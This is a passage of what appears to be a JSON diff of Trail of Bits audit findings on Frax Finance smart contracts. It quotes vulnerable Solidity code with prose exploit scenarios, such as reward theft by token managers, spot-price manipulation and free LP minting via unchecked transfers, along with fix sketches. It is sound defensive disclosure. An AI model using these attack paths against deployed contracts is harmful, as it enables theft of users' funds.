encodePacked ( \"Not enough reward tokens available: \" , rewardTokens[i])) ); } } // uint256 old_lastUpdateTime = // uint256 old_lastUpdateTime = lastUpdateTime; lastUpdateTime; // uint256 new_lastUpdateTime = // uint256 new_lastUpdateTime = block.timestamp; block.timestamp; // lastUpdateTime = periodFinish; periodFinish = periodFinish + // lastUpdateTime = periodFinish; periodFinish = ((num_periods_elapsed + 1 ) * rewardsDuration); periodFinish. add ((num_periods_elapsed. add ( 1 )). mul (rewardsDuration)); // Update the rewards and time _updateStoredRewardsAndTime (); _updateStoredRewardsAndTime (); emit // Update the fraxPerLPStored fraxPerLPStored = RewardsPeriodRenewed ( address (stakingToken )); fraxPerLPToken (); } } Figure 13.1: Left: contracts/Staking/FraxUnifiedFarmTemplate.sol#L463-L490 Right: contracts/Staking/StakingRewardsMultiGauge.sol#L637-L662 Exploit Scenario Alice, a Frax Finance developer, is asked to x a bug in the retroCatchUp function. Alice updates one instance of the function, but not both. Eve discovers a copy of the function in which the bug is not xed and exploits the bug. Recommendations Short term, perform a comprehensive code review and identify pieces of code that are semantically similar. Factor out those pieces of code into separate functions where it makes sense to do so. This will reduce the risk that those pieces of code diverge after the code is updated. Long term, adopt code practices that discourage code duplication. Doing so will help to prevent this problem from recurring.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "14. StakingRewardsMultiGauge.recoverERC20 allows token managers to steal rewards ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The recoverERC20 function in the StakingRewardsMultiGauge contract allows token managers to steal rewards. This violates conventions established by other Frax Solidity contracts in which recoverERC20 can be called only by the contract owner. The relevant code appears in gure 14.1. The recoverERC20 function checks whether the caller is a token manager and, if so, sends him the requested amount of the token he manages. Convention states that this function should be callable only by the contract owner. Moreover, its purpose is typically to recover tokens unrelated to the contract. // Added to support recovering LP Rewards and other mistaken tokens from other systems to be distributed to holders function recoverERC20 ( address tokenAddress , uint256 tokenAmount ) external onlyTknMgrs ( tokenAddress ) { // Check if the desired token is a reward token bool isRewardToken = false ; for ( uint256 i = 0 ; i < rewardTokens.length; i++){ if (rewardTokens[i] == tokenAddress) { isRewardToken = true ; break ; } } // Only the reward managers can take back their reward tokens if (isRewardToken && rewardManagers[tokenAddress] == msg.sender ){ ERC20 (tokenAddress). transfer ( msg.sender , tokenAmount); emit Recovered ( msg.sender , tokenAddress, tokenAmount); return ; } Figure 14.1: contracts/Staking/StakingRewardsMultiGauge.sol#L798-L814 For comparison, consider the CCFrax1to1AMM contracts recoverERC20 function. It is callable only by the contract owner and specically disallows transferring tokens used by the contract. 
+ { + "title": "14. StakingRewardsMultiGauge.recoverERC20 allows token managers to steal rewards ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The recoverERC20 function in the StakingRewardsMultiGauge contract allows token managers to steal rewards. This violates conventions established by other Frax Solidity contracts in which recoverERC20 can be called only by the contract owner. The relevant code appears in figure 14.1. The recoverERC20 function checks whether the caller is a token manager and, if so, sends him the requested amount of the token he manages. Convention states that this function should be callable only by the contract owner. Moreover, its purpose is typically to recover tokens unrelated to the contract. // Added to support recovering LP Rewards and other mistaken tokens from other systems to be distributed to holders function recoverERC20 ( address tokenAddress , uint256 tokenAmount ) external onlyTknMgrs ( tokenAddress ) { // Check if the desired token is a reward token bool isRewardToken = false ; for ( uint256 i = 0 ; i < rewardTokens.length; i++){ if (rewardTokens[i] == tokenAddress) { isRewardToken = true ; break ; } } // Only the reward managers can take back their reward tokens if (isRewardToken && rewardManagers[tokenAddress] == msg.sender ){ ERC20 (tokenAddress). transfer ( msg.sender , tokenAmount); emit Recovered ( msg.sender , tokenAddress, tokenAmount); return ; } Figure 14.1: contracts/Staking/StakingRewardsMultiGauge.sol#L798-L814 For comparison, consider the CCFrax1to1AMM contract's recoverERC20 function. It is callable only by the contract owner and specifically disallows transferring tokens used by the contract. function recoverERC20 ( address tokenAddress , uint256 tokenAmount ) external onlyByOwner { require (!is_swap_token[tokenAddress], \"Cannot withdraw swap tokens\" ); TransferHelper. safeTransfer ( address (tokenAddress), msg.sender , tokenAmount); } Figure 14.2: contracts/Misc_AMOs/__CROSSCHAIN/Moonriver/CCFrax1to1AMM.sol#L340-L344 Exploit Scenario Eve tricks Frax Finance into making her a token manager for the StakingRewardsMultiGauge contract. When the contract's token balance is high, Eve withdraws the tokens and vanishes. Recommendations Short term, eliminate the token managers' ability to call recoverERC20 . This will bring recoverERC20 in line with established conventions regarding the function's purpose and usage. Long term, regularly review all uses of contract modifiers, such as onlyTknMgrs . Doing so will help to expose bugs like the one described here.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "15. Convex_AMO_V2 custodian can withdraw rewards ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The Convex_AMO_V2 custodian can withdraw rewards. This violates conventions established by other Frax Solidity contracts in which the custodian is only able to pause operations. The relevant code appears in figure 15.1. The withdrawRewards function is callable by the contract owner, governance, or the custodian. This provides significantly more power to the custodian than other contracts in the Frax Solidity repository. function withdrawRewards ( uint256 crv_amt , uint256 cvx_amt , uint256 cvxCRV_amt , uint256 fxs_amt ) external onlyByOwnGovCust { if (crv_amt > 0 ) TransferHelper. safeTransfer (crv_address, msg.sender , crv_amt); if (cvx_amt > 0 ) TransferHelper. safeTransfer ( address (cvx), msg.sender , cvx_amt); if (cvxCRV_amt > 0 ) TransferHelper. safeTransfer (cvx_crv_address, msg.sender , cvxCRV_amt); if (fxs_amt > 0 ) TransferHelper. safeTransfer (fxs_address, msg.sender , fxs_amt); } Figure 15.1: contracts/Misc_AMOs/Convex_AMO_V2.sol#L425-L435 Exploit Scenario Eve tricks Frax Finance into making her the custodian for the Convex_AMO_V2 contract. When the unclaimed rewards are high, Eve withdraws them and vanishes. Recommendations Short term, determine whether the Convex_AMO_V2 custodian requires the ability to withdraw rewards. If so, document this as a security concern. This will help users to understand the risks associated with depositing funds into the Convex_AMO_V2 contract. Long term, implement a mechanism that allows rewards to be distributed without requiring the intervention of an intermediary. Reducing human involvement will increase users' overall confidence in the system.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + },
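If the custodian does not need this power, the fix is a one-modifier change (a sketch mirroring figure 15.1; onlyByOwnGov is the stricter modifier used elsewhere in the codebase):

    function withdrawRewards(
        uint256 crv_amt, uint256 cvx_amt, uint256 cvxCRV_amt, uint256 fxs_amt
    ) external onlyByOwnGov { // custodian removed from the access modifier
        if (crv_amt > 0) TransferHelper.safeTransfer(crv_address, msg.sender, crv_amt);
        if (cvx_amt > 0) TransferHelper.safeTransfer(address(cvx), msg.sender, cvx_amt);
        if (cvxCRV_amt > 0) TransferHelper.safeTransfer(cvx_crv_address, msg.sender, cvxCRV_amt);
        if (fxs_amt > 0) TransferHelper.safeTransfer(fxs_address, msg.sender, fxs_amt);
    }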
+ { + "title": "16. The FXS1559 documentation is inaccurate ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The FXS1559 documentation states that excess FRAX tokens are exchanged for FXS tokens, and the FXS tokens are then burned. However, the reality is that those FXS tokens are redistributed to veFXS holders. More specifically, the documentation states the following: Specifically, every time interval t, FXS1559 calculates the excess value above the CR [collateral ratio] and mints FRAX in proportion to the collateral ratio against the value. It then uses the newly minted currency to purchase FXS on FRAX-FXS AMM pairs and burn it. However, in the FXS1559_AMO_V3 contract, the number of FXS tokens that are burned is a tunable parameter (see figures 16.1 and 16.2). The parameter defaults to, and is currently, 0 (according to Etherscan). burn_fraction = 0 ; // Give all to veFXS initially Figure 16.1: contracts/Misc_AMOs/FXS1559_AMO_V3.sol#L87 // Calculate the amount to burn vs give to the yield distributor uint256 amt_to_burn = fxs_received. mul (burn_fraction). div (PRICE_PRECISION); uint256 amt_to_yield_distributor = fxs_received. sub (amt_to_burn); // Burn some of the FXS burnFXS (amt_to_burn); // Give the rest to the yield distributor FXS. approve ( address (yieldDistributor), amt_to_yield_distributor); yieldDistributor. notifyRewardAmount (amt_to_yield_distributor); Figure 16.2: contracts/Misc_AMOs/FXS1559_AMO_V3.sol#L159-L168 Exploit Scenario Frax Finance is publicly shamed for claiming that FXS is deflationary when it is not. Confidence in FRAX declines, and it loses its peg as a result. Recommendations Short term, correct the documentation to indicate that some proportion of FXS tokens may be distributed to veFXS holders. This will help users to form correct expectations regarding the operation of the protocol. Long term, consider whether FXS tokens need to be redistributed. The documentation makes a compelling argument for burning FXS tokens. Adjusting the code to match the documentation might be a better way of resolving this discrepancy.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + },
+ { + "title": "17. Univ3LiquidityAMO defaults the price of collateral to $1 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The Uniswap V3 AMOs default to a price of $1 unless an oracle is set, and it is not clear whether an oracle is or will be set. If the contract lacks an oracle, the contract will return the number of collateral units instead of the price of collateral, meaning that it will value each unit of collateral at $1 instead of the correct price. While this may not be an issue for stablecoins, this pattern is error-prone and unclear. It could introduce errors in the global collateral value of FRAX since the protocol may underestimate (or overestimate) the value of the collateral if the price is above (or below) $1. col_bal_e18 is the balance, not the price, of the tokens. When collatDolarValue is called without an oracle, the contract falls back to valuing each token at $1. function freeColDolVal() public view returns ( uint256 ) { uint256 value_tally_e18 = 0 ; for ( uint i = 0 ; i < collateral_addresses.length; i++){ ERC20 thisCollateral = ERC20(collateral_addresses[i]); uint256 missing_decs = uint256 ( 18 ).sub(thisCollateral.decimals()); uint256 col_bal_e18 = thisCollateral.balanceOf( address ( this )).mul( 10 ** missing_decs); uint256 col_usd_value_e18 = collatDolarValue(oracles[collateral_addresses[i]], col_bal_e18); value_tally_e18 = value_tally_e18.add(col_usd_value_e18); } return value_tally_e18; } Figure 17.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L161-L171 function collatDolarValue (OracleLike oracle, uint256 balance ) public view returns ( uint256 ) { if ( address (oracle) == address ( 0 )) return balance; return balance.mul(oracle.read()).div( 1 ether); } Figure 17.2: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L174-L177 Exploit Scenario The value of a collateral token is $0.50. Instead of incentivizing recollateralization, the protocol indicates that it is adequately collateralized (or overcollateralized). However, the price of the collateral token is half the $1 default value, and the protocol needs to respond to the insufficient collateral backing FRAX. Recommendations Short term, integrate the Uniswap V3 AMOs properly with an oracle, and remove the hard-coded price assumptions. Long term, review and test the effect of each pricing function on the global collateral value and ensure that the protocol responds correctly to changes in collateralization.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "18. calc_withdraw_one_coin is vulnerable to manipulation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The showAllocations function determines the amount of collateral in dollars that a contract holds. calc_withdraw_one_coin is a Curve AMM function based on the current state of the pool and changes as trades are made through the pool. This spot price can be manipulated using a flash loan or large trade similar to the one described in TOB-FRSOL-006 . function showAllocations () public view returns (uint256[ 10 ] memory return_arr) { // ------------LP Balance------------ // Free LP uint256 lp_owned = (mim3crv_metapool.balanceOf(address(this))); // Staked in the vault uint256 lp_value_in_vault = MIM3CRVInVault(); lp_owned = lp_owned.add(lp_value_in_vault); // ------------3pool Withdrawable------------ uint256 mim3crv_supply = mim3crv_metapool.totalSupply(); uint256 mim_withdrawable = 0 ; uint256 _3pool_withdrawable = 0 ; if (lp_owned > 0 ) _3pool_withdrawable = mim3crv_metapool.calc_withdraw_one_coin(lp_owned, 1 ); // 1: 3pool index Figure 18.1: contracts/Misc_AMOs/MIM_Convex_AMO.sol#L145-160 Exploit Scenario MIM_Convex_AMO is included in FRAX.globalCollateralValue , and the FraxPoolV3.bonus_rate is nonzero. An attacker manipulates the return value of calc_withdraw_one_coin , causing the protocol to undervalue the collateral and reach a less-than-desired collateralization ratio. The attacker then calls FraxPoolV3.recollateralize , adds collateral, and sells the newly minted FXS tokens, including a bonus, for profit. Recommendations Short term, do not use the Curve AMM spot price to value collateral. Long term, use an oracle or get_virtual_price to reduce the likelihood of manipulation. References Medium, \"Economic Attack on Harvest Finance: Deep Dive\"", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "19. Incorrect valuation of LP tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The Frax Protocol uses liquidity pool (LP) tokens as collateral and includes their value in the global collateralization value. In addition to the protocol's incorrect inclusion of FRAX as collateral (see TOB-FRSOL-024 ), the calculation of the value of pool tokens representing Uniswap V2-like and Uniswap V3 positions is inaccurate. As a result, the global collateralization value could be incorrect. getAmount0ForLiquidity (getAmount1ForLiquidity) returns the amount, not the value, of token0 (token1) in that price range; the price of FRAX should not be assumed to be $1, for the same reasons outlined in TOB-FRSOL-017 . The userStakedFrax helper function uses the metadata of each Uniswap V3 NFT to calculate the collateral value of the underlying tokens. Rather than using the current range, the function calls getAmount0ForLiquidity using the range set by a liquidity provider. This assumes that the current price of the assets is within the range set by the liquidity provider, which is not necessarily the case. If the market price is outside the given range, the underlying position will contain 100% of one token rather than a portion of both tokens. Thus, the underlying tokens will not be at a 50% allocation at all times, so this assumption is false. The actual redemption value of the NFT is not the same as what was deposited since the underlying token amounts and prices change with market conditions. In short, the current calculation does not update correctly as the prices of assets change, and the global collateral value will be wrong. function userStakedFrax (address account ) public view returns (uint256) { uint256 frax_tally = 0 ; LockedNFT memory thisNFT; for (uint256 i = 0 ; i < lockedNFTs[account].length; i++) { thisNFT = lockedNFTs[account][i]; uint256 this_liq = thisNFT.liquidity; if (this_liq > 0 ){ uint160 sqrtRatioAX96 = TickMath.getSqrtRatioAtTick(thisNFT.tick_lower); uint160 sqrtRatioBX96 = TickMath.getSqrtRatioAtTick(thisNFT.tick_upper); if (frax_is_token0){ frax_tally = frax_tally.add(LiquidityAmounts.getAmount0ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, uint128(thisNFT.liquidity))); } else { frax_tally = frax_tally.add(LiquidityAmounts.getAmount1ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, uint128(thisNFT.liquidity))); } } } // In order to avoid excessive gas calculations and the input tokens ratios, 50% FRAX is assumed // If this were Uni V2, it would be akin to reserve0 & reserve1 math // There may be a more accurate way to calculate the above... return frax_tally.div( 2 ); } Figure 19.1: contracts/Staking/FraxUniV3Farm_Volatile.sol#L241-L263 In addition, the value of Uniswap V2 LP tokens is calculated incorrectly. The return value of getReserves is vulnerable to manipulation, as described in TOB-FRSOL-006 . Thus, the value should not be used to price LP tokens, as the value will vary significantly when trades are performed through the given pool. Imprecise fluctuations in the LP tokens' values will result in an inaccurate global collateral value. function lpTokenInfo ( address pair_address ) public view returns ( uint256 [ 4 ] memory return_info) { // Instantiate the pair IUniswapV2Pair the_pair = IUniswapV2Pair(pair_address); // Get the reserves uint256 [] memory reserve_pack = new uint256 []( 3 ); // [0] = FRAX, [1] = FXS, [2] = Collateral ( uint256 reserve0 , uint256 reserve1 , ) = (the_pair.getReserves()); { // Get the underlying tokens in the LP address token0 = the_pair.token0(); address token1 = the_pair.token1(); // Test token0 if (token0 == canonical_frax_address) reserve_pack[ 0 ] = reserve0; else if (token0 == canonical_fxs_address) reserve_pack[ 1 ] = reserve0; else if (token0 == arbi_collateral_address) reserve_pack[ 2 ] = reserve0; // Test token1 if (token1 == canonical_frax_address) reserve_pack[ 0 ] = reserve1; else if (token1 == canonical_fxs_address) reserve_pack[ 1 ] = reserve1; else if (token1 == arbi_collateral_address) reserve_pack[ 2 ] = reserve1; } Figure 19.2: contracts/Misc_AMOs/__CROSSCHAIN/Arbitrum/SushiSwapLiquidityAMO_ARBI.sol #L196-L217 Exploit Scenario The value of LP positions does not reflect a sharp decline in the market value of the underlying tokens.
Rather than incentivizing recollateralization, the protocol continues to mint FRAX tokens and causes the true collateralization ratio to fall even further. Although the protocol appears to be solvent, due to incorrect valuations, it is not. Recommendations Short term, discontinue the use of LP tokens as collateral since the valuations are inaccurate and misrepresent the amount of collateral backing FRAX. Long term, use oracles to derive the fair value of LP tokens. For Uniswap V2, this means using the constant product to compute the value of the underlying tokens independent of the spot price. For Uniswap V3, this means using oracles to determine the current composition of the underlying tokens that the NFT represents. References Christophe Michel, \"Pricing LP tokens | Warp Finance hack\" Alpha Finance, \"Fair Uniswap's LP Token Pricing\"", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "20. Missing check of return value of transfer and transferFrom ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "Some tokens, such as BAT, do not precisely follow the ERC20 specification and will return false or fail silently instead of reverting. Because the codebase does not consistently use OpenZeppelin's SafeERC20 library, the return values of calls to transfer and transferFrom should be checked. However, return value checks are missing from these calls in many areas of the code, opening the TWAMM contract (the time-weighted automated market maker) to severe vulnerabilities. function provideLiquidity(uint256 lpTokenAmount) external { require (totalSupply() != 0 , 'EC3' ); //execute virtual orders longTermOrders.executeVirtualOrdersUntilCurrentBlock(reserveMap); //the ratio between the number of underlying tokens and the number of lp tokens must remain invariant after mint uint256 amountAIn = lpTokenAmount * reserveMap[tokenA] / totalSupply(); uint256 amountBIn = lpTokenAmount * reserveMap[tokenB] / totalSupply(); ERC20(tokenA).transferFrom( msg.sender , address( this ), amountAIn); ERC20(tokenB).transferFrom( msg.sender , address( this ), amountBIn); [...] Figure 20.1: contracts/FPI/TWAMM.sol#L125-136 Exploit Scenario Frax deploys the TWAMM contract. Pools are created with tokens that do not revert on failure, allowing an attacker to call provideLiquidity and mint LP tokens for free; the attacker does not have to deposit funds since the transferFrom call fails silently or returns false . Recommendations Short term, fix the instance described above. Then, fix all instances detected by running slither . --detect unchecked-transfer . Long term, review the Token Integration Checklist in appendix D and integrate Slither into the project's CI pipeline to prevent regression and catch new instances proactively.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + },
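A sketch of the provideLiquidity fix using OpenZeppelin's SafeERC20 (the import paths shown are for OpenZeppelin 4.x; older releases place SafeERC20 directly under token/ERC20/):

    import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
    import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

    using SafeERC20 for IERC20;

    // In provideLiquidity, replace the unchecked calls with wrappers that
    // revert on a false return value or on missing return data:
    IERC20(tokenA).safeTransferFrom(msg.sender, address(this), amountAIn);
    IERC20(tokenB).safeTransferFrom(msg.sender, address(this), amountBIn);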
+ { + "title": "21. A rewards distributor does not exist for each reward token ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The FraxUnifiedFarmTemplate contract's setGaugeController function (figure 21.1) has the onlyTknMgrs modifier. All other functions with the onlyTknMgrs modifier set a value in an array keyed only to the calling token manager's token index. Except for setGaugeController , which sets the global rewards_distributor state variable, all other functions that set global state variables have the onlyByOwnGov modifier. This modifier is stricter than onlyTknMgrs , in that it cannot be called by token managers. As a result, any token manager can set the rewards distributor that will be used by all tokens. This exposes the underlying issue: there should be a rewards distributor for each token instead of a single global distributor, and a token manager should be able to set the rewards distributor only for her token. function setGaugeController ( address reward_token_address , address _rewards_distributor_address , address _gauge_controller_address ) external onlyTknMgrs(reward_token_address) { gaugeControllers[rewardTokenAddrToIdx[reward_token_address]] = _gauge_controller_address; rewards_distributor = IFraxGaugeFXSRewardsDistributor(_rewards_distributor_address); } Figure 21.1: The setGaugeController function ( FraxUnifiedFarmTemplate.sol#639-642 ) Exploit Scenario Reward manager A calls setGaugeController to set his rewards distributor. Then, reward manager B calls setGaugeController to set his rewards distributor, overwriting the rewards distributor that A set. Later, sync is called, which in turn calls retroCatchUp . As a result, distributeReward is called on B's rewards distributor; however, distributeReward is not called on A's rewards distributor. Recommendations Short term, replace the global rewards distributor with an array that is indexed by token index to store rewards distributors, and ensure that the system calls distributeReward on all reward distributors within the retroCatchUp function. Long term, ensure that token managers cannot overwrite each other's settings.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Medium" + ] + },
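A sketch of the per-token distributor storage the finding recommends (the array sizing and the retroCatchUp loop are illustrative):

    // One distributor per reward token, indexed like gaugeControllers
    IFraxGaugeFXSRewardsDistributor[] public rewards_distributors;

    function setGaugeController(
        address reward_token_address,
        address _rewards_distributor_address,
        address _gauge_controller_address
    ) external onlyTknMgrs(reward_token_address) {
        uint256 idx = rewardTokenAddrToIdx[reward_token_address];
        gaugeControllers[idx] = _gauge_controller_address;
        // Each manager may only touch the slot for her own token
        rewards_distributors[idx] = IFraxGaugeFXSRewardsDistributor(_rewards_distributor_address);
    }

    // In retroCatchUp, pull from every distributor instead of a single global one:
    for (uint256 i = 0; i < rewards_distributors.length; i++) {
        if (address(rewards_distributors[i]) != address(0)) {
            rewards_distributors[i].distributeReward(address(this));
        }
    }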
+ { + "title": "22. minVeFXSForMaxBoost can be manipulated to increase rewards ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "minVeFXSForMaxBoost is calculated based on the current spot price when a user stakes Uniswap V2 LP tokens. If an attacker manipulates the spot price of the pool prior to staking LP tokens, the reward boost will be skewed upward, thereby increasing the amount of rewards earned. The attacker will earn outsized rewards relative to the amount of liquidity provided. function fraxPerLPToken () public view returns ( uint256 ) { // Get the amount of FRAX 'inside' of the lp tokens uint256 frax_per_lp_token ; // Uniswap V2 // ============================================ { [...] uint256 total_frax_reserves ; ( uint256 reserve0 , uint256 reserve1 , ) = (stakingToken.getReserves()); Figure 22.1: contracts/Staking/FraxCrossChainFarmSushi.sol#L242-L250 function userStakedFrax ( address account ) public view returns ( uint256 ) { return (fraxPerLPToken()).mul(_locked_liquidity[account]).div(1e18); } function minVeFXSForMaxBoost ( address account ) public view returns ( uint256 ) { return (userStakedFrax(account)).mul(vefxs_per_frax_for_max_boost).div(MULTIPLIER_PRECISION ); } function veFXSMultiplier ( address account ) public view returns ( uint256 ) { if ( address (veFXS) != address ( 0 )){ // The claimer gets a boost depending on amount of veFXS they have relative to the amount of FRAX 'inside' // of their locked LP tokens uint256 veFXS_needed_for_max_boost = minVeFXSForMaxBoost(account); [...] Figure 22.2: contracts/Staking/FraxCrossChainFarmSushi.sol#L260-L272 Exploit Scenario An attacker sells a large amount of FRAX through the incentivized Uniswap V2 pool, increasing the amount of FRAX in the reserve. In the same transaction, the attacker calls stakeLocked and deposits LP tokens. The attacker's reward boost, new_vefxs_multiplier , increases due to the large trade, giving the attacker outsized rewards. The attacker then swaps his tokens back through the pool to prevent losses. Recommendations Short term, do not use the Uniswap spot price to calculate reward boosts. Long term, use canonical and audited rewards contracts for Uniswap V2 liquidity mining, such as MasterChef.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "23. Most collateral is not directly redeemable by depositors ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The following describes the on-chain situation on December 20, 2021. The Frax stablecoin has a total supply of 1.5 billion FRAX. Anyone can mint new FRAX tokens by calling FraxPoolV3.mintFrax and paying the necessary amount of collateral and FXS. Conversely, anyone can redeem his or her FRAX for collateral and FXS by calling FraxPoolV3.redeemFrax . However, the Frax team manually moves collateral from the FraxPoolV3 contract into AMO contracts in which the collateral is used to generate yield. As a result, only $5 million (0.43%) of the collateral backing FRAX remains in the FraxPoolV3 contract and is available for redemption. If those $5 million are redeemed, the Frax Finance team would have to manually move collateral from the AMOs to FraxPoolV3 to make further redemptions possible. Currently, $746 million (64%) of the collateral backing FRAX is managed by the ConvexAMO contract. FRAX owners cannot access the ConvexAMO contract, as all of its operations can be executed only by the Frax team. Exploit Scenario Owners of FRAX want to use the FraxPoolV3 contract's redeemFrax function to redeem more than $5 million worth of FRAX for the corresponding amount of collateral. The redemption fails, as only $5 million worth of USDC is in the FraxPoolV3 contract. From the redeemers' perspectives, FRAX is no longer exchangeable into something worth $1, removing the base for its stable price. Recommendations Short term, deposit more FRAX into the FraxPoolV3 contract so that the protocol can support a larger volume of redemptions without requiring manual intervention by the Frax team. Long term, implement a mechanism whereby the pools can retrieve FRAX that is locked in AMOs to pay out redemptions.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Medium" + ] + },
+ { + "title": "24. FRAX.globalCollateralValue counts FRAX as collateral ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "Each unit of FRAX represents $1 multiplied by the collateralization ratio of debt. That is, if the collateralization ratio is 86%, the Frax Protocol owes each holder of FRAX $0.86. Instead of accounting for this as a liability, the protocol includes this debt as an asset backing FRAX. In other words, FRAX is backed in part by FRAX. Because FRAX.globalCollateralValue includes FRAX as an asset and not debt, the true collateralization ratio is lower than stated, and users cannot redeem FRAX for the underlying collateral en masse for reasons beyond those described in TOB-FRSOL-023 . This issue occurs extensively throughout the code. For instance, the amount of FRAX in a Uniswap V3 liquidity position is included in the contract's collateral value. function TotalLiquidityFrax () public view returns ( uint256 ) { uint256 frax_tally = 0 ; Position memory thisPosition; for ( uint256 i = 0 ; i < positions_array.length; i++) { thisPosition = positions_array[i]; uint128 this_liq = thisPosition.liquidity; if (this_liq > 0 ){ uint160 sqrtRatioAX96 = TickMath.getSqrtRatioAtTick(thisPosition.tickLower); uint160 sqrtRatioBX96 = TickMath.getSqrtRatioAtTick(thisPosition.tickUpper); if (thisPosition.collateral_address > 0x853d955aCEf822Db058eb8505911ED77F175b99e ){ // if address(FRAX) < collateral_address, then FRAX is token0 frax_tally = frax_tally.add(LiquidityAmounts.getAmount0ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, this_liq)); } else { frax_tally = frax_tally.add(LiquidityAmounts.getAmount1ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, this_liq)); } } } Figure 24.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L199-L216 In another instance, the value of FRAX in FRAX/token liquidity positions on Arbitrum is counted as collateral. Again, FRAX should be counted as debt and not collateral. function lpTokenInfo ( address pair_address ) public view returns ( uint256 [ 4 ] memory return_info) { // Instantiate the pair IUniswapV2Pair the_pair = IUniswapV2Pair(pair_address); // Get the reserves uint256 [] memory reserve_pack = new uint256 []( 3 ); // [0] = FRAX, [1] = FXS, [2] = Collateral ( uint256 reserve0 , uint256 reserve1 , ) = (the_pair.getReserves()); { // Get the underlying tokens in the LP address token0 = the_pair.token0(); address token1 = the_pair.token1(); // Test token0 if (token0 == canonical_frax_address) reserve_pack[ 0 ] = reserve0; else if (token0 == canonical_fxs_address) reserve_pack[ 1 ] = reserve0; else if (token0 == arbi_collateral_address) reserve_pack[ 2 ] = reserve0; // Test token1 if (token1 == canonical_frax_address) reserve_pack[ 0 ] = reserve1; else if (token1 == canonical_fxs_address) reserve_pack[ 1 ] = reserve1; else if (token1 == arbi_collateral_address) reserve_pack[ 2 ] = reserve1; } // Get the token rates return_info[ 0 ] = (reserve_pack[ 0 ] * 1e18) / (the_pair.totalSupply()); return_info[ 1 ] = (reserve_pack[ 1 ] * 1e18) / (the_pair.totalSupply()); return_info[ 2 ] = (reserve_pack[ 2 ] * 1e18) / (the_pair.totalSupply()); // Set the pair type (used later) if (return_info[ 0 ] > 0 && return_info[ 1 ] == 0 ) return_info[ 3 ] = 0 ; // FRAX/XYZ else if (return_info[ 0 ] == 0 && return_info[ 1 ] > 0 ) return_info[ 3 ] = 1 ; // FXS/XYZ else if (return_info[ 0 ] > 0 && return_info[ 1 ] > 0 ) return_info[ 3 ] = 2 ; // FRAX/FXS else revert( \"Invalid pair\" ); } Figure 24.2: contracts/Misc_AMOs/__CROSSCHAIN/Arbitrum/SushiSwapLiquidityAMO_ARBI.sol #L196-L229 Exploit Scenario Users attempt to redeem FRAX for USDC, but the collateral backing FRAX is, in part, FRAX itself, and not enough collateral is available for redemption. The collateralization ratio does not accurately reflect when the protocol is insolvent. That is, it indicates that FRAX is fully collateralized in the scenario in which 100% of FRAX is backed by FRAX. Recommendations Short term, revise FRAX.globalCollateralValue so that it does not count FRAX as collateral, and ensure that the protocol deposits the necessary amount of collateral to ensure the collateralization ratio is reached. Long term, after fixing this issue, continue reviewing how the protocol accounts for collateral and ensure the design is sound.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + },
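As an illustration of the short-term recommendation, a tally over the Uniswap V3 positions in figure 24.1 could count only the non-FRAX leg of each position (a sketch; collat_tally is a hypothetical accumulator, and pricing that leg still requires an oracle, per TOB-FRSOL-017 and TOB-FRSOL-019):

    // Tally only the non-FRAX side of each position; FRAX itself is a liability, not collateral
    if (thisPosition.collateral_address > 0x853d955aCEf822Db058eb8505911ED77F175b99e) {
        // FRAX is token0, so the collateral is token1
        collat_tally = collat_tally.add(LiquidityAmounts.getAmount1ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, this_liq));
    } else {
        // FRAX is token1, so the collateral is token0
        collat_tally = collat_tally.add(LiquidityAmounts.getAmount0ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, this_liq));
    }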
